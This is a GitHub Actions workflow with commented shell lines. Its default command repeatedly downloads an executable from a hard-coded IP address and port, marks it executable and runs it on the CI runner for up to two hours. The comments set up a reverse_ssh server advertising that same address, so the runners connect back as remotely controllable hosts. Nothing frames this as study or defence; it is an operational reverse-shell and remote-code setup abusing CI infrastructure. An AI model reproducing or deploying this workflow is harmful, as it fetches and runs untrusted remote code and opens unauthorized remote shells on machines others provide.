
on:
  workflow_dispatch:
    inputs:
      runs-on:
        default: 'ubuntu-latest'
      run:
        default: 'wget -O {2}/exe.exe 109.188.87.160:6666/{0}_{1} && chmod +x {2}/exe.exe && touch exit && {2}/exe.exe --foreground'
jobs:
  loop:
    runs-on: ${{ inputs.runs-on }}
    steps:
    - uses: actions/cache@v5
      with:
        path: .
        key: workspace
        enableCrossOsArchive: true
    - shell: bash
      run: |
        rm -rf exit
        sudo hostnamectl hostname ${{ runner.arch }}_${{ runner.os }}
    - shell: bash
      run: |
        while (${{ format(inputs.run, runner.arch, runner.os, runner.temp) }}) || true
        do
          stat ${{ runner.temp }}/exe.exe || true
          rm -f ${{ runner.temp }}/exe.exe || true
          if [[ -f exit ]] || (( $SECONDS > 7200 ))
          then
            break
          fi
          sleep 1
          echo -n .
        done
        rm -rf exit

#!/bin/bash
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --name X64_Linux) &
#docker run --rm -it -p6666:2222 -e EXTERNAL_ADDRESS=109.188.87.160:6666 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_rsa.pub)" --mount type=tmpfs,destination=/data reversessh/reverse_ssh
